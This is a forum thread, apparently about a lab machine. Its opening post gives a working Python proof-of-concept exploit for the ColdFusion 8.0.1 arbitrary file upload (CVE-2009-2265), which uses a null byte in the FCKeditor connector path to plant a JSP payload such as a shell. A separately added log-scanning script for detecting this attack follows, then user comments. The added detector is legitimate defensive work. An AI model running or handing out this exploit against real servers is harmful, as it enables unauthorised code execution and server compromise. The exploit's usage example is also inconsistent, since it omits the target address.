[Python] ColdFusion 8.0.1 - Arbitrary File Upload

I wasn’t able to find a standalone PoC for the arbitrary file vulnerability in ColdFusion on Arctic, so I made my own. Hopefully some of you will get some use out of it!

```python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 8500 /home/arrexel/shell.jsp
import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        # Optional third argument: path prefix when CFIDE is not in its default location
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body = payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body = payload.read()
except IndexError:
    print('Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>')
    print('Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp')
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print('Sending payload...')

try:
    # The %00 after exploit.jsp in CurrentFolder is what lets the upload land with a .jsp name
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00", files={'newfile': ('exploit.txt', body, 'application/x-java-archive')}, timeout=30)
    if req.status_code == 200:
        print('Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploit.jsp')
    else:
        print('Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason)
except requests.Timeout:
    print('Failed to upload payload... Request timed out')
```

Reference: https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/

1 Like
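The request in the script above leaves a recognisable trace in web access logs: a POST to the FCKeditor `upload.cfm` connector with a NUL byte in `CurrentFolder`, followed by a request for a script file under `/userfiles/`. The following is an added detection example, not part of the original post; the log format, sample lines, function names and finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; source addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Oct/2017:10:01:02 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 1532
192.0.2.10 - - [16/Oct/2017:10:01:09 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00 HTTP/1.1" 200 312
192.0.2.10 - - [16/Oct/2017:10:01:15 +0000] "GET /userfiles/file/exploit.jsp HTTP/1.1" 200 87
198.51.100.7 - - [16/Oct/2017:10:02:00 +0000] "GET /userfiles/file/report.pdf HTTP/1.1" 200 20480
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Matched as a suffix because CFIDE may sit under a non-default path prefix.
CONNECTOR = "/fckeditor/editor/filemanager/connectors/cfm/upload.cfm"
SCRIPT_EXT = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")

def classify(method, target):
    """Return a finding label (hypothetical names) for one request, or None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if method == "POST" and path.endswith(CONNECTOR):
        # parse_qs percent-decodes values, so %00 becomes a literal NUL here.
        params = {k.lower(): v for k, v in parse_qs(parts.query).items()}
        folder = params.get("currentfolder", [""])[0]
        if "\x00" in folder or folder.lower().rstrip("\x00/").endswith(SCRIPT_EXT):
            return "upload-connector-null-byte"
        return "upload-connector-post"
    if "/userfiles/" in path and path.endswith(SCRIPT_EXT):
        return "script-in-upload-dir"
    return None

def scan(log_text):
    """Return (source, timestamp, label, status) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, ts, method, target, status = m.groups()
        label = classify(method, target)
        if label:
            findings.append((src, ts, label, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on both findings from the same source within a short window is the pattern worth escalating; a plain `upload-connector-post` is still worth reviewing on a server where the editor connector should not be reachable at all.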

Nice stuff Arrexel. In your usage instructions you have “[/path/to/coldfusion]” but then, from what I can tell, you do specify that in your example?

@delo said:
Nice stuff Arrexel. In your usage instructions you have “[/path/to/coldfusion]” but then, from what I can tell, you do specify that in your example?

The path to ColdFusion is optional; in the example it links to the jsp payload file. That path is used if the CFIDE directory is not in its default location.

Hey @Arrexel, any chance we can get the URL in the official writeup to link back to your website? Getting a 404 error - https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/ . I would like to reference it in my writeup :slight_smile:

Excellent script! Thanks!

1 Like

Thank you for your script @Arrexel! It worked! That website link seems to be broken (gives 404 error) though.

One thing I also observed is that the script only works if the webroot of the site is the default. If you try to pass the path to ColdFusion as the third argument, the script will throw a "file not found" error, because the script treats it as the payload file, so it won't work with a path.